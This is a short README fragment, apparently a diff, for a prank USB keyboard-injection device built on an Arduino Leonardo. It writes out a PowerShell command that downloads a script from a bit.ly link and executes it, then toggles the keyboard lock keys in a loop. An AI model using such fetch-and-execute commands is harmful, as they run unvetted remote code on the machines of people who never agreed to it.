JDL-84/LeonardoRickRoll/README.md

    ```powershell
    powershell.exe -Command ""iex (New-Object Net.WebClient).DownloadString('https://bit.ly/3n8DTGj')""
    ```
+   You can just run this manually from run/cmd prompt for testing.
+   Original script is from [leeholmes.com](http://www.leeholmes.com/projects/ps_html5/Invoke-PSHtml5.ps1) Moved here to prevent executing a scrpit externally from this repo.
+In case it gets changed to do something more nefarious.
 3. Enters a DO WHILE for ~2mins, tubmbling the keyboard locks
    ```c
    Press("CAPSLOCK");delay(_delay); Keyboard.releaseAll();   Press("NUMLOCK"); delay(_delay);Keyboard.releaseAll();   Press("SCROLLLOCK"); delay(_delay); Keyboard.releaseAll();